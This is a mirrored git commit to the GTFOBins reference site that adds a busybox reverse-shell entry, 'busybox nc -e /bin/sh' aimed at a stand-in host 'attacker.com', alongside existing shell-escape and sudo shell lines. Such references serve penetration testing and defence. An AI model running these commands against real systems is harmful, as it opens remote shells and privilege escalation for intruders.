mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Added reverse shell functionality to busybox if "busybox nc" is available
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
afadeeb61e
commit
a5a1f86b97
@ -21,4 +21,10 @@ functions:
|
|||||||
code: "./busybox sh"
|
code: "./busybox sh"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo busybox sh
|
- code: sudo busybox sh
|
||||||
|
reverse-shell:
|
||||||
|
- description: Run `nc -lvp 12345` on the attacker box to receive the shell.
|
||||||
|
code: |
|
||||||
|
RHOST=attacker.com
|
||||||
|
RPORT=12345
|
||||||
|
busybox nc -e /bin/sh $RHOST $RPORT
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user